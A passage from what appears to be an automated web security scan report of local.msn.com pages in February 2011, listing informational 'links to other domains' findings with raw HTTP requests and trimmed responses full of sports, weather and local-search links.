<li><a href="http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420">Rangers, Napoli avoid arbitration with $5.8M deal</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Rangers-trade-Francisco-to-Blue-Jays-for-Napoli-03177108">Rangers trade Francisco to Blue Jays for Napoli</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377" title="FC Dallas"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif" alt="FC Dallas logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">FC Dallas</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382" title="Houston Dynamo"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif" alt="Houston Dynamo logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Houston Dynamo</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/team/dallas-stars" title="Dallas Stars"><img src="http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png" alt="Dallas Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nhl/team/dallas-stars">Dallas Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/story/Canucks-4-Stars-1-09236511">Canucks 4, Stars 1</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/CanucksStars-Preview-69558990">Canucks-Stars Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/Big-night-for-Blackhawks-at-NHL-AllStar-game-44649940">Big night for Blackhawks at NHL All-Star game</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nhl/story/AllStars-11-AllStars-10-09051499">All-Stars 11, All-Stars 10</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/stats/">Stats</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/schedule/">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="f579394"]&form=MSNLAP">Official Black Eyed Peas Super Bowl Party</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z161455405"]&form=MSNLAP">Super Bowl Playboy Party</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=events near 75207&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP">Everything's Bigger in Texas Party DUEX Super Celebrity Party</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&resize=false">Feedback</a>
...[SNIP]...

17.136. http://local.msn.com/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/ten-day.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.msn.com/ten-day.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/forecast?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660836&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /ten-day.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c279bd506e6d40f195e5a25430336bee; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FCE5D7EF386B435B9D7D858E68A17C41; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:56 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660836&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC">Wednesday, Feb. 02, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomemsn.com/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/forecast?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

17.137. http://local.msn.com/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/weather.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.msn.com/weather.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /weather.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA26
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fea2bc55cca2422ea2f4d14fc87732b7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=CFBB35589C61491A84F91A12CF6075D5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC">Wednesday, Feb. 02, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomemsn.com/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

17.138. http://local.msn.com/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/weather.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.msn.com/weather.aspx?GT1=24000

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fweather.aspx%3FGT1%3D24000&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /weather.aspx?GT1=24000 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA26
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1df53c103f0e4fed9b0d1f396b8c1ca3; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DDEB0F24A5EB4659A81C47B70F3E515F; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
